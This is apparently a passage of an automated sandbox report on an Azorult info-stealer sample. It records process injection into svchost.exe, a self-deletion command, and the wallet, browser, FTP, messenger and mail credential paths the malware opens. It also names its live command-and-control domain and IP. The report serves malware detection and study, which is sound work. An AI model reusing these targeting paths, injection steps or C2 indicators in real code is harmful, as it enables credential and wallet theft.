                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B4CE8 mov eax, dword ptr fs:[00000030h]0_2_004B4CE8
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D3500 mov eax, dword ptr fs:[00000030h]0_2_036D3500
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D34A0 mov eax, dword ptr fs:[00000030h]0_2_036D34A0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D1E70 mov eax, dword ptr fs:[00000030h]0_2_036D1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407A34 mov eax, dword ptr fs:[00000030h]2_2_00407A34
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_004F0B62
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004C2622
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004B083F
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B09D5 SetUnhandledExceptionFilter,0_2_004B09D5
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004B0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.128.117 80Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Po#70831.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D2A008Jump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004F1201
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004D2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004D2BA5
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FB226 SendInput,keybd_event,0_2_004FB226
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_005122DA
                Source: C:\Users\user\Desktop\Po#70831.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Po#70831.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3Jump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_004F0B62
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004F1663
                Source: Po#70831.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Po#70831.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B0698 cpuid 0_2_004B0698
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00416FB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00404B4C
                Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00508195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00508195
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004ED27A GetUserNameW,0_2_004ED27A
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_004CB952
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004942DE
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Azorult
                Source: Yara matchFile source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2484833657.00000000067AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2483360582.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Po#70831.exe PID: 6900, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4396, type: MEMORYSTR
                Yara detected Azorult Info Stealer
                Source: Yara matchFile source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Po#70831.exe PID: 6900, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4396, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus Eden\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: Po#70831.exeBinary or memory string: WIN_81
                Source: Po#70831.exeBinary or memory string: WIN_XP
                Source: Po#70831.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Po#70831.exeBinary or memory string: WIN_XPe
                Source: Po#70831.exeBinary or memory string: WIN_VISTA
                Source: Po#70831.exeBinary or memory string: WIN_7
                Source: Po#70831.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 2.2.svchost.exe.60c5e12.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.605a6c1.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.60386d4.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4396, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00511204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00511204
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00511806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00511806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		2
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts                		2
                Obfuscated Files or Information                		2
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation                		1
                Timestomp                		1
                Credentials In Files                		147
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		112
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets231
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts                		Cached Domain Credentials1
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501074 Sample: Po#70831.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 31 ln6b9.shop 2->31 35 Multi AV Scanner detection for domain / URL 2->35 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 10 other signatures 2->41 9 Po#70831.exe 4 2->9         started        signatures3 process4 signatures5 43 Binary is likely a compiled AutoIt script file 9->43 45 Found API chain indicative of sandbox detection 9->45 47 Writes to foreign memory regions 9->47 49 2 other signatures 9->49 12 svchost.exe 69 9->12         started        process6 dnsIp7 33 ln6b9.shop 172.67.128.117, 49717, 49718, 80 CLOUDFLARENETUS United States 12->33 23 C:\Users\user\AppData\...\vcruntime140.dll, PE32 12->23 dropped 25 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 12->25 dropped 27 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 12->27 dropped 29 45 other files (none is malicious) 12->29 dropped 51 System process connects to network (likely due to code injection or exploit) 12->51 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->53 55 Tries to steal Instant Messenger accounts or passwords 12->55 57 6 other signatures 12->57 17 cmd.exe 1 12->17         started        file8 signatures9 process10 process11 19 conhost.exe 17->19         started        21 timeout.exe 1 17->21         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Po#70831.exe33%VirustotalBrowse
                Po#70831.exe71%ReversingLabsWin32.Trojan.AutoitInject
                Po#70831.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-console-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-datetime-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-debug-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-errorhandling-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l1-2-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-file-l2-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-handle-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-heap-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-interlocked-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-libraryloader-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-localization-l1-2-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-memory-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-namedpipe-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processenvironment-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dll0%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                ln6b9.shop2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                http://ocsp.thawte.com00%URL Reputationsafe
                http://ip-api.com/json0%URL Reputationsafe
                http://www.mozilla.com00%URL Reputationsafe
                http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                http://ln6b9.shop/LN341/index.php100%Avira URL Cloudmalware
                http://ln6b9.shop/LN341/index.phpA0%Avira URL Cloudsafe
                https://dotbit.me/a/0%Avira URL Cloudsafe
                http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                http://ln6b9.shop/LN341/index.php9%VirustotalBrowse
                https://dotbit.me/a/1%VirustotalBrowse
                http://ln6b9.shop/LN341/index.phpA2%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ln6b9.shop
                		172.67.128.117
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://ln6b9.shop/LN341/index.phptrue
                • 9%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.mozilla.com/en-US/blocklist/mozglue.dll.2.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://crl.thawte.com/ThawteTimestampingCA.crl0svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                • URL Reputation: safe
                		unknown
                http://ln6b9.shop/LN341/index.phpAsvchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.thawte.com0svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                • URL Reputation: safe
                		unknown
                http://ip-api.com/jsonPo#70831.exe, 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.mozilla.com0svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                • URL Reputation: safe
                		unknown
                https://dotbit.me/a/Po#70831.exe, 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                172.67.128.117
                		ln6b9.shopUnited States
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1501074
                Start date and time:2024-08-29 12:01:11 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 53s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
